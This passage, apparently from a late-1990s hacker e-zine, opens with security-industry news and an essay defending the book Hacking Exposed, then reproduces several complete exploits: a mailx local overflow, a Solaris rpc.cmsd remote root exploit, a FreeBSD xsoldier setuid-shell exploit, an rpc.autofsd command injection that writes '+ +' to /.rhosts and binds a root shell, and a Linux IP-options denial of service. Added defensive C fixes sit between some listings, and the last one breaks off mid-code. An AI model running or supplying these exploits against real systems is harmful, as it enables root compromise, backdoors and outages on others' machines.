      Software Patrol SafePassage for VirtualVault simplifies
      the deployment of secure extranets. Entry-level price for
      VirtualVault is now $17,500.
      http://www.hp.com/security
      
      *eNABLE SUPPORTS RAINBOW AND RSA
      eNABLE Solutions and Rainbow Technologies will develop
      an integrated solution that combines enRole, eNABLE's
      e-business access management system, with iKey, Rainbow's
      USB authentication device, providing end-users with
      two-factor hardware authentication in a scalable
      solution. In related news, eNABLE announced that it has
      enhanced enRole to provide support for RSA ACE/Server
      authentication management software from RSA Security.
      http://www.enablesolutions.com
      http://www.rainbow.com
      http://www.rsasecurity.com
      
      *CELO DEBUTS CELOCOM VPN SUITE
      Fully integrated with Celo Communications's PKI
      technology, the CeloCom VPN suite offers authentication,
      encryption and full X.509 and LDAP compliance. The suite
      can be integrated into existing networks and can
      interoperate with other VPN products, certificate
      management systems, smart cards and readers, and LDAP
      directory services. The suite is comprised of four
      CeloCom products: CeloCom Secure remote access, CeloCom
      RVPN and CeloCom LVPN remote VPN clients, and CeloCom
      GateKeeper remote access server.
      http://www.celocom.com
      
      *RSA JOINS TRUSTED COMPUTING PLATFORM ALLIANCE
      RSA Security Inc. joined the Trusted Computing Platform
      Alliance (TCPA), an industry group whose goal is to
      establish a new hardware and software specification that
      technology companies can use to offer more trusted and
      secure personal computers for conducting e-business. RSA
      Security will work alongside founding members Compaq, HP,
      IBM, Intel and Microsoft to simplify the RSA deployment,
      use and manageability of SecurID technologies by
      enhancing and standardizing security at the level of the
      platform hardware, BIOS and operating system.
      http://www.rsasecurity.com
      
      *ENTEGRITY PARTNERS WITH IDENTRUS
      Secure e-business applications provider Entegrity
      Solutions has announced an agreement with the Identrus
      alliance to develop enterprise-ready solutions based on
      the Identrus trust model that meet Identrus
      specifications for global e-commerce interoperability and
      security. Using cryptography and PKI technology,
      Entegrity will work with Identrus-member financial
      institutions and solution providers to "trust-enable"
      standard, legacy and custom applications used for b-to-b
      e-commerce. Identrus members now represent 11 global
      financial institutions in more than 100 countries with
      more than 8 million business relationships.
      http://www.entegrity.com
      http://www.identrus.com
      
      *SCHLUMBERGER INTRODUCES EASYFLEX CORPORATE
      In order to meet the growing security concerns of the
      corporate market, Schlumberger has introduced Easyflex
      Corporate, a new dual-interface contact/contactless smart
      card that facilitates secure access to the real and
      virtual desktop. The card controls physical access to
      offices, buildings and parking lots through its
      contactless interface, as well as logical access to
      computers, servers and networks through its secure
      contact interface.
      http://www.smartcards.com
      
      *IDENTIX BIOLOGON AVAILABLE ONLINE
      Biometric security provider Identix last week made its
      BioLogon network security fingerprint identification
      software and hardware available as a new product at
      Beyond.com's Web site. Visitors to Beyond.com can
      download the BioLogon fingerprint identification suite,
      and obtain biometric hardware readers in multiple
      options.
      http://www.beyond.com
      http://www.identix.com
      
      *TUMBLEWEED ACQUIRES WORLDTALK
      Secure messaging provider Tumbleweed Communications
      Corp. last week announced a definitive agreement to
      acquire Worldtalk Corp. When combined with Worldtalk's
      WorldSecure e-mail content filtering products,
      Tumbleweed's Integrated Messaging Exchange (IME) will
      enable customers to centrally define and enforce policies
      that drive new traffic across IME. Worldtalk will become
      a wholly owned subsidiary of Tumbleweed. The transaction
      is expected to close in the first quarter of 2000. Terms
      were not released.
      http://www.tumbleweed.com
      http://www.worldtalk.com
      
      =====================================================
      
      3. HAPPENINGS
      
      Cards on the 'Net -- Smart Cards and ID Technology:
      Unlocking the Commercial Potential of the Web
      Tu-Th, Nov. 30-Dec. 2, San Francisco, Calif.
      http://www.ctst.com
      
      DECEMBER
      IT Solutions & Information Assurance Conference
      W, Dec. 1, Los Angeles, Calif.
      W & Th, Dec. 8 & 9, Colorado Springs, Colo.
      http://www.technologyforums.com
      
      18th Annual Data Center Conference: Taking the Data
      Center to E-business and Beyond
      W-F, Dec. 1-3, Orlando, Fla.
      http://www.gartner.com
      
      15th Annual Computer Security
      Applications Conference
      M-F, Dec. 6-10, Phoenix, Ariz.
      http://www.acsac.org
      
      Web and Intranet Security
      T-Th, Dec. 7-9 Orlando, Fla.
      http://www.misti.com
      
      SANS Security San Francisco
      S-Th, Dec. 11-16, San Francisco, Calif.
      http://www.sans.org/sf99/sf99.htm
      
      Extranet Security
      M-W, Dec. 13-15 San Francisco, Calif.
      http://www.unex.berkeley.edu/eng
      
      =====================================================
      
      4. SECURITY PERSPECTIVES
      
      *EXPOSING HACKING WITH HACKING EXPOSED
      By Ben Rothke
      
      Do books about hacking create more hackers? Is corporate
      America at risk due to such titles?
      
      Many people in the computer industry feel that such
      dissemination of information is a sure way to increase
      computer malevolence. The question has been re-ignited
      with the publication of Hacking Exposed: Network Security
      Secrets and Solutions, by Stuart McClure, Joel Scambray
      and George Kurtz, all formerly with Ernst & Young's
      e-security group. Are such titles simply cookbooks for
      those attempting to perform computer crimes? The
      knee-jerk answer might be yes, but in reality, the answer
      is a clear no.
      
      As an example, will the reader of Adventures in the
      Kitchen by Wolfgang Puck emerge as a gourmet chef, or
      will the reader of Dr. Atkins's New Diet Revolution lose
      weight by reading the book? While the written word is
      powerful, and Hacking Exposed is indeed a powerful book,
      there is no way for a book to instantaneously turn a
      novice into a dangerous hacker.
      
      While a preponderance of corporate systems are indeed
      insecure, it is irresponsible and capricious to think
      that the mere appearance of a book such as Hacking
      Exposed will create a landslide of hacker activity. Such
      an allegation is simply an attempt to transfer corporate
      America's apathy towards information security, and apply
      a quick blame to a much larger problem.
      
      Anyone who views hacking as an exercise in reading a
      book does not understand hacking, nor the nature of
      securing computer systems. True, the book lists tools and
      exercises that will make a hacking exercise easier. But
      to perform a real hack is something that takes more than
      the book has to offer. The authors state something to the
      effect of, "hacking root is a state of mind." With such a
      mantra, the true hacker will know that running a few
      handy tools or scripts will only provide them with a
      start to their hacking endeavor. When the tools fail,
      where will they go on? If not their own fortitude, their
      own quest for root, a quest that can not be found in any
      book, then the hacking attempt will quickly end there.
      
      Want to know a secret? Contrary to the movies and CNN
      reports, hacking is a pretty boring exercise. Just as a
      novice hunter will tire after a short while, so too will
      a script kiddie wear down easily. For the novice hacker,
      the appearance of a book about hacking will neither help
      nor hinder his aspirations. Traversing through networks,
      servers and myriad hosts is tedious at best for the
      greenhorn. It is only the media and uninitiated who
      attempt to glamorize such activities.
      
      Hacking Exposed is an important title for those who are
      interested in securing their systems, and know what the
      innumerable vulnerabilities within their systems are.
      Will such a title unleash a new wave of hackers? No.
      
      Ben Rothke (brothke@ebnetworks.com) is a network
      security consultant with eB Networks Inc.
      
      =====================================================
      ADVERTISEMENT
      ICSA.net announces a free Webcast, "An Overview of
      Intrusion Detection Technologies," to air on Dec. 9,
      1999. This one-hour seminar will explain intrusion
      detection and vulnerability assessment in clear terms, as
      well as announce the new ICSA Intrusion Detection Buyers'
      Guide, an online resource for decision-makers. For
      details, visit http://www.icsa.net.
      =====================================================
      
      Security Wire Digest and Information Security magazine
      are published by ICSA.net, the world's leader in Internet
      Security services.
      
      Copyright (c) 1999. All rights reserved. No portion of
      this newsletter may be redistributed or republished in
      any format without the express consent of the publisher.
      =====================================================
      
      @HWA
      
38.0  mailx.c slackware 3.6 local exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      /*
      
        I dunno if this is an old overflow or (it probably is...) but I was just
        messing with the Slackware 3.6 source and found it.
      
        Here's some basic notes on what happens:
      
        $HOME environment dir contains exploit.
        Exploit buffer size = 1024 + 8
      
        tinit() is called first. This gets the homedir variable from cp which is a
        value returned by getenv("HOME");
      
        load() is called next, taking as an argument an expanded "~/.mailrc".
      
        expand():
      
        if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) {
          sprintf(xname, "%s%s", homedir, name + 1);
      
        xname size = 1024
      
        homedir == getenv("HOME")
        name == "~/.mailrc"
      
        "~/.mailrc" is at end of the buffer, so this should just be pushed over
        the stack and forgotten about. 
      
       */
      /*  
       *  mailx buffer overflow
       *
       */
      
      #include <stdio.h>
      #include <stdlib.h>
      
      #define BSIZE  (1024)
      #define OSIZE  (8)
      #define ESIZE  (BSIZE + OSIZE)
      #define NOP    (0x90)
      #define OFFSET (0)
      
      char hellcode[] =
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
              "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
              "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      
      long get_esp (void)
      {
        __asm__ ("movl %esp, %eax");
      }
      
      int main (int argc, char * * argv)
      {
        char * evil;
        int i, j;
        long addr;
        int offset = OFFSET;
      
        evil = (char *)malloc(ESIZE);
      
        for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
          evil[i] = NOP;  
      
        for (j = 0; i < (ESIZE - 4); ++i, ++j)
          evil[i] = hellcode[j];  
      
        if (argc > 1) offset = atoi(argv[1]);
      
        addr = (get_esp() - offset);
      
        *(long *)(evil + i) = addr;
      
        setenv("HOME", evil, 1);
      
        fprintf(stderr, "\nmailx-8.1.1 exploit\n");
        fprintf(stderr, "Using address 0x%x, offset %d\n\n", addr, offset);
      
        execl("/usr/bin/mail", "mail", NULL);
      
      }
      /*                    www.hack.co.za                    */      
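
      The unbounded sprintf() in expand() described in the notes above, rewritten
      with a length check. This is an added example, not mailx source and not part
      of the original post; expand_home(), the status codes and the helper
      expand_with_home_len() are assumed names, and XNAME_SIZE is the 1024 from the notes.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define XNAME_SIZE 1024            /* size of xname given in the notes */

enum expand_status {
    EXPAND_OK       =  0,
    EXPAND_NO_HOME  = -1,          /* "~" used but no usable home directory */
    EXPAND_TOO_LONG = -2,          /* result would not fit in the buffer */
    EXPAND_BAD_ARG  = -3
};

/*
 * Bounded counterpart of the pattern quoted in the notes:
 *
 *     if (name[0] == '~' && (name[1] == '/' || name[1] == '\0'))
 *         sprintf(xname, "%s%s", homedir, name + 1);
 *
 * homedir comes from getenv("HOME"), so its length is chosen by whoever
 * starts the program. snprintf() never writes more than xsize bytes, and
 * its return value (the length the full result would have had) is used
 * to reject truncated paths instead of silently opening a different file.
 */
static int expand_home(const char *name, const char *homedir,
                       char *xname, size_t xsize)
{
    int n;

    if (name == NULL || xname == NULL || xsize == 0)
        return EXPAND_BAD_ARG;
    xname[0] = '\0';

    if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) {
        if (homedir == NULL || homedir[0] == '\0')
            return EXPAND_NO_HOME;
        n = snprintf(xname, xsize, "%s%s", homedir, name + 1);
    } else {
        /* Not a "~" or "~/..." name: copy through, still bounded. */
        n = snprintf(xname, xsize, "%s", name);
    }

    if (n < 0 || (size_t)n >= xsize) {
        xname[0] = '\0';           /* never hand back a truncated path */
        return EXPAND_TOO_LONG;
    }
    return EXPAND_OK;
}

/*
 * Constructed input: a home directory of home_len 'A' bytes, expanded
 * with "~/.mailrc" into a buffer of XNAME_SIZE bytes. Returns the
 * status from expand_home().
 */
static int expand_with_home_len(size_t home_len)
{
    char home[2 * XNAME_SIZE];
    char xname[XNAME_SIZE];

    if (home_len >= sizeof(home))
        return EXPAND_BAD_ARG;
    memset(home, 'A', home_len);
    home[home_len] = '\0';
    return expand_home("~/.mailrc", home, xname, sizeof(xname));
}

int main(void)
{
    char xname[XNAME_SIZE];
    int rc = expand_home("~/.mailrc", "/home/alice", xname, sizeof(xname));

    printf("normal HOME       : rc=%d path=%s\n", rc, xname);
    /* 1024 + 8 is the buffer size named in the notes. */
    printf("HOME of 1032 bytes: rc=%d\n", expand_with_home_len(XNAME_SIZE + 8));
    return 0;
}
```

      Callers should treat any non-zero status as "do not load the file" rather
      than falling back to the raw name.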
      
      @HWA
      
39.0  cmsdex.c Solaris (2.6 / 7.0) remote exploit.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /*
       *  cmsdex - i386 Solaris remote root exploit for /usr/dt/bin/rpc.cmsd
       *
       * Tested and confirmed under Solaris 2.6 and 7.0 (i386)
       *
       *  Usage:  % cmsdex -h hostname -c command -s sp -o offset
       *
       *  where hostname is the hostname of the machine running the vulnerable
       *  CDE calendar service, command is the command to run as root on the
       *  vulnerable machine, sp is the %esp stack pointer value, and offset
       *  is the number of bytes to add to sp to calculate your target %eip
       *  (try -1000 to 1000 in increments of 10 or so for starters once you
       *  have a good guess at the stack pointer).
       *
       *  When specifying a command, be sure to pass it to the exploit as a
       *  single argument, namely enclose the command string in quotes if it
       *  contains spaces or other special shell delimiter characters.  The
       *  command string must not be longer than 100 bytes.  The exploit will
       *  pass this string without modification to /bin/sh -c on the remote
       *  machine, so any normally allowed Bourne shell syntax is also allowed
       *  in the command string.  Due to the nature of the exploit, the command
       *  string must not contain any @ characters.
       *
       *  Demonstration values for i386 Solaris:
       *
       *  (2.6)  cmsdex -h host.example.com -c "touch /0wn3d" -s 0x0804748c -o 0
       *  (7.0)  cmsdex -h host.example.com -c "touch /0wn3d" -s 0x08047378 -o 0
       *
       *  June 4, 1999
       */
      
      #include <stdlib.h>
      #include <stdio.h>
      #include <string.h>
      #include <unistd.h>
      #include <rpc/rpc.h>
      
      #define CMSD_PROG 100068
      #define CMSD_VERS 4
      #define CMSD_PROC 21
      
      #define EGGLEN 1036
      #define JUGULAR 1024
      #define NOP 0x90
      
      char shell[] =
      /*  0 */ "\xeb\x3d"                         /* jmp springboard       */
      /* syscall:                                                          */
      /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0         */
      /*  9 */ "\xc3"                             /* ret                   */
      /* start:                                                            */
      /* 10 */ "\x5e"                             /* popl %esi             */
      /* 11 */ "\x31\xc0"                         /* xor %eax,%eax         */
      /* 13 */ "\x89\x46\xbf"                     /* movl %eax,-0x41(%esi) */
      /* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c(%esi)  */
      /* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
      /* 22 */ "\x88\x46\x17"                     /* movb %al,0x17(%esi)   */
      /* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a(%esi)   */
      /* 28 */ "\x88\x46\xff"                     /* movb %al,0x??(%esi)   */
      /* execve:                                                           */
      /* 31 */ "\x31\xc0"                         /* xor %eax,%eax         */
      /* 33 */ "\x50"                             /* pushl %eax            */
      /* 34 */ "\x56"                             /* pushl %esi            */
      /* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%esi),%ebx  */
      /* 38 */ "\x89\x1e"                         /* movl %ebx,(%esi)      */
      /* 40 */ "\x53"                             /* pushl %ebx            */
      /* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%esi),%ebx  */
      /* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4(%esi)   */
      /* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%esi),%ebx  */
      /* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8(%esi)   */
      /* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al        */
      /* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall          */
      /* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp        */
      /* springboard:                                                      */
      /* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start            */
      /* data:                                                             */
      /* 68 */ "\xff\xff\xff\xff"                 /* DATA                  */
      /* 72 */ "\xff\xff\xff\xff"                 /* DATA                  */
      /* 76 */ "\xff\xff\xff\xff"                 /* DATA                  */
      /* 80 */ "\xff\xff\xff\xff"                 /* DATA                  */
      /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                  */
      /* 92 */ "\x2d\x63\xff";                    /* DATA                  */
      
      extern char *optarg;
      
      struct cm_send {
          char *s1;
          char *s2;
      };
      
      struct cm_reply {
          int i;
      };
      
      bool_t
      xdr_cm_send(XDR *xdrs, struct cm_send *objp)
      {
          if (!xdr_wrapstring(xdrs, &objp->s1))
              return (FALSE);
          if (!xdr_wrapstring(xdrs, &objp->s2))
              return (FALSE);
          return (TRUE);
      }
      
      bool_t
      xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
      {
          if (!xdr_int(xdrs, &objp->i))
              return (FALSE);
          return (TRUE);
      }
      
      int
      main(int argc, char *argv[])
      {
          int c, slen, clen;
          char *program, *hostname, *command, egg[EGGLEN+1], *eggp;
          unsigned long int sp = 0, addr, alen = 16;
          long int offset = 0;
          CLIENT *cl;
          struct cm_send send;
          struct cm_reply reply;
          struct timeval tm = { 10, 0 };
          enum clnt_stat stat;
      
          program = argv[0];
          hostname = "localhost";
          command = "chmod 666 /etc/shadow";
      
          while ((c = getopt(argc, argv, "h:c:s:o:a:")) != EOF) {
              switch (c) {
              case 'h':
                  hostname = optarg;
                  break;
              case 'c':
                  command = optarg;
                  break;
              case 's':
                  sp = strtoul(optarg, NULL, 0);
                  break;
              case 'o':
                  offset = strtol(optarg, NULL, 0);
                  break;
              case 'a':
                  alen = strtoul(optarg, NULL, 0);
                  break;
              case '?':
              default:
                  printf("usage: %s -h hostname -c command -s sp -o offset\n",
                         program);
                  exit(1);
                  break;
              }
          }
      
          slen = strlen(shell);
          clen = strlen(command);
      
          if (clen > 100) {
              printf("exploit failed; command string too long "
                     "(must not exceed 100 characters)\n");
              exit(1);
          }
          shell[30] = (char) (clen + 27);
      
          memset(egg, NOP, EGGLEN);
          eggp = egg + EGGLEN - alen - 1 - clen - slen;
          memcpy(eggp, shell, slen); eggp += slen;
          memcpy(eggp, command, clen); eggp += clen;
          *eggp++ = '\xff'; addr = sp + offset;
          while (eggp <= egg + EGGLEN - 4) {
              *eggp++ = (addr >>  0) & 0xff;
              *eggp++ = (addr >>  8) & 0xff;
              *eggp++ = (addr >> 16) & 0xff;
              *eggp++ = (addr >> 24) & 0xff;
          }
          egg[JUGULAR] = '\xff'; egg[EGGLEN] = '\0';
          send.s1 = egg; send.s2 = "";
      
          cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
          if (cl == NULL) {
              clnt_pcreateerror("clnt_create");
              printf("exploit failed; unable to contact RPC server\n");
              exit(1);
          }
          cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
          stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
                           xdr_cm_reply, (caddr_t) &reply, tm);
          if (stat == RPC_SUCCESS) {
              printf("exploit failed; RPC succeeded and returned %d\n", reply.i);
              clnt_destroy(cl);
              exit(1);
          } else {
              clnt_perror(cl, "clnt_call");
              printf("exploit probably worked; RPC failure was expected\n");
              clnt_destroy(cl);
              exit(0);
          }
      }
      /*                    www.hack.co.za                    */      
      
      @HWA
      
40.0  xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        
      
      /* 
       * xsoldier exploit for Freebsd-3.3-RELEASE
       * Drops a suid root shell in /bin/sh
       * Brock Tellier btellier@usa.net
       */
      
      
      #include <stdio.h>
      
      char shell[]= /* mudge@l0pht.com */
        "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
        "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
        "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
        "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
      
      #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
      
      void buildui() {
      FILE *fp;
        char cc[100];
        fp = fopen("/tmp/ui.c", "w");
        fprintf(fp, CODE);
        fclose(fp);
        snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
        system(cc);
      }
      
      main (int argc, char *argv[] ) {
        int x = 0;
        int y = 0;
        int offset = 0;
        int bsize = 4400;
        char buf[bsize];
        int eip = 0xbfbfdb65; /* works for me */
        buildui();
      
        if (argv[1]) { 
          offset = atoi(argv[1]);
          eip = eip + offset;
        }
        fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");
        fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
        fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
       
        for ( x = 0; x < 4325; x++) buf[x] = 0x90;
          fprintf(stderr, "NOPs to %d\n", x);
       
        for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
          fprintf(stderr, "Shellcode to %d\n",x);
        
        buf[x++] =  eip & 0x000000ff;
        buf[x++] = (eip & 0x0000ff00) >> 8;
        buf[x++] = (eip & 0x00ff0000) >> 16;
        buf[x++] = (eip & 0xff000000) >> 24;
          fprintf(stderr, "eip to %d\n",x);
      
        buf[bsize]='\0';
        execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
      }
      /*                    www.hack.co.za                    */
      
      @HWA
      
41.0  rpc.autofsd.c FreeBSD/misc remote exploit by guidob.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      // *** Synnergy Networks
      
      // * Description:
      //
      // Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
      // on tcp port 530.
      
      // * Author:
      //
      // guidob (guidob@synnergy.net)
      // Synnergy Networks (c) 1999, http://www.synnergy.net
      
      // * Greets:
      //
      // Synnergy Networks, LoU, Cindy
      
      // * Comments:
      //
      // This will not work on all types and/or versions. 
      
      // *** Synnergy Networks
      
      #include <sys/types.h>
      #include <sys/time.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <stdlib.h>
      #include <errno.h>
      #include <string.h>
      #include <netdb.h>
      #include <rpc/rpc.h>
      #include <rpc/xdr.h>
      #include <signal.h>
      
      #define AUTOFS_PROG ((u_long)100099)
      #define AUTOFS_VERS ((u_long)1)
      #define AUTOFS_MOUNT ((u_long)1)
      
      #define AT 8
      #define A_MAXNAME 255
      #define A_MAXOPTS 255
      #define A_MAXPATH 1024
      
      struct mntrequest {
              char *name;     /* name to be looked up */
              char *map;      /* map to use           */
              char *opts;     /* default options      */
              char *path;     /* mountpoint to use    */
      };
      
      struct mntres {
              int status;     /* 0=OK, otherwise an errno from <sys/errno.h> */
      };
      
      bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
        if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
        if (!xdr_string(xdrs, &objp->map, A_MAXNAME))  return (FALSE);
        if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
        if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
        return (TRUE);
      }
      void signal_handler(void) {
              exit(0);
      }
      bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
        if (!xdr_int(xdrs, &objp->status)) return (FALSE);
        return (TRUE);
      }
      
      main(int argc, char **argv){
      
        CLIENT *cl;
        struct mntrequest mntreq;
        struct mntres *res;
        struct sockaddr_in target;
        struct hostent *hp;
        struct timeval tm;
        char *host;
        enum clnt_stat stat;
      
      
      int sd;
      
       signal(SIGALRM, signal_handler);
      
        alarm(AT);
        host=argv[1];
      
        if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
          if ((hp = gethostbyname(host)) == NULL) {
            printf("%s: cannot resolve\n", host);
            exit(1);
          } else
            target.sin_addr.s_addr = *(u_long *)hp->h_addr;
        }
        target.sin_family=AF_INET;
        target.sin_port=0;
      
        sd=RPC_ANYSOCK;
        tm.tv_sec=8;
      
        tm.tv_usec=0;
        if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
          clnt_pcreateerror("clnt_create");
          exit(0);
        }
        cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
        tm.tv_sec = 25;
      
      /* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
      */
        mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* You can put whatever you want here */
        mntreq.map="/bin/true";
        mntreq.path="/hosts";
        mntreq.opts="";
        bzero((char *)&res, sizeof(res));
      
        if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
             (xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
          clnt_perror(cl, "clnt_call");
          exit(1);
        }
      
        clnt_destroy(cl);
      }
      
      // EOF
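
      The request in the listing above carries shell metacharacters in
      mntreq.name, which only matters if the receiving daemon hands that field
      to a shell. The following is an added example, not part of the original
      listing or of any autofs implementation: assuming the daemon runs an
      executable map with the lookup key as its argument, it shows the key
      validated against an allowlist and the map started without a shell. The
      helper names and the sample keys are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define A_MAXNAME 255   /* same bound the listing uses for name and map */

/* Hypothetical helper: accept only the characters a lookup key needs. */
int key_is_safe(const char *key)
{
    size_t n = strlen(key);

    if (n == 0 || n > A_MAXNAME)
        return 0;
    /* strspn() gives the length of the leading run of allowed characters */
    return strspn(key, "abcdefghijklmnopqrstuvwxyz"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "0123456789._-") == n;
}

/*
 * Hypothetical helper: run an executable map with the key as one argv entry.
 * No shell parses the key, so ';', '|', '`' and '$' stay plain data.
 * Returns the number of output bytes stored in out (NUL-terminated), or -1.
 */
int run_map_noshell(const char *map, const char *key, char *out, size_t outsz)
{
    int fds[2], status;
    pid_t pid;
    size_t used = 0;
    ssize_t n;

    if (outsz == 0 || pipe(fds) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {                       /* child: stdout goes to the pipe */
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0)
            _exit(127);
        close(fds[1]);
        execl(map, map, key, (char *)NULL);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);
    while (used < outsz - 1 &&
           (n = read(fds[0], out + used, outsz - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0 ||
        !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return (int)used;
}

/* Reject the key before any process is started, then run without a shell. */
int handle_lookup(const char *map, const char *key, char *out, size_t outsz)
{
    if (!key_is_safe(key))
        return -1;
    return run_map_noshell(map, key, out, outsz);
}

int main(void)
{
    char out[128];
    const char *keys[] = { "hosts", "a;echo b" };   /* constructed samples */
    size_t i;

    for (i = 0; i < sizeof(keys) / sizeof(keys[0]); i++) {
        int r = handle_lookup("/bin/echo", keys[i], out, sizeof(out));
        printf("%-10s -> %s", keys[i], r < 0 ? "rejected\n" : out);
    }
    return 0;
}
```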
      
      @HWA
      
42.0  iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      /* Exploit option length missing checks in:
           Debian Linux 2.1
           RedHat Linux 5.2
           Linux kernel 2.0.38
           Linux kernel 2.0.37
           Linux kernel 2.0.36
           Linux kernel 2.0.35
           Linux kernel 2.0

                Andrea Arcangeli <andrea@suse.de>

       */
      
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netinet/udp.h>
      #include <netinet/ip.h>
      
      main()
      {
              int sk;
              struct sockaddr_in sin;
              struct hostent * hostent;
      #define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
      #define OPT_SIZE 1
              char payload[PAYLOAD_SIZE];
      
              sk = socket(AF_INET, SOCK_DGRAM, 0);
              if (sk < 0)
                      perror("socket"), exit(1);
      
              if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
      
                      perror("setsockopt"), exit(1);
      
              bzero((char *)&sin, sizeof(sin));
      
              sin.sin_port = htons(0);
              sin.sin_family = AF_INET;
              sin.sin_addr.s_addr = htonl(2130706433);
      
              if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
                      perror("connect"), exit(1);
      
              if (write(sk, payload, PAYLOAD_SIZE) < 0)
                      perror("write"), exit(1);
      }
      /*                    www.hack.co.za                    */
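
      The header comment of the listing above attributes the problem to
      missing option length checks. The following is an added example, not
      part of the original file and not the kernel's code: it shows the bounds
      checks an IPv4 options walker has to make before trusting an option's
      length byte. The function, enum and sample names are hypothetical and
      the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define OPT_EOL      0   /* end of option list, single byte */
#define OPT_NOP      1   /* no operation, single byte */
#define MAX_OPT_LEN 40   /* 60-byte maximum IPv4 header minus 20 fixed bytes */

enum opt_status { OPT_OK = 0, OPT_TOO_LONG, OPT_TRUNCATED, OPT_BAD_LENGTH };

/*
 * Walk an IPv4 options area of len bytes. Every multi-byte option is
 * type, length, data, where length counts the type and length bytes too.
 */
enum opt_status check_ip_options(const uint8_t *opt, size_t len)
{
    size_t i = 0;

    if (len > MAX_OPT_LEN)
        return OPT_TOO_LONG;

    while (i < len) {
        uint8_t type = opt[i];
        size_t left = len - i;
        size_t olen;

        if (type == OPT_EOL)
            return OPT_OK;            /* anything after EOL is padding */
        if (type == OPT_NOP) {
            i++;
            continue;
        }
        if (left < 2)
            return OPT_TRUNCATED;     /* type byte with no length byte */
        olen = opt[i + 1];
        if (olen < 2 || olen > left)
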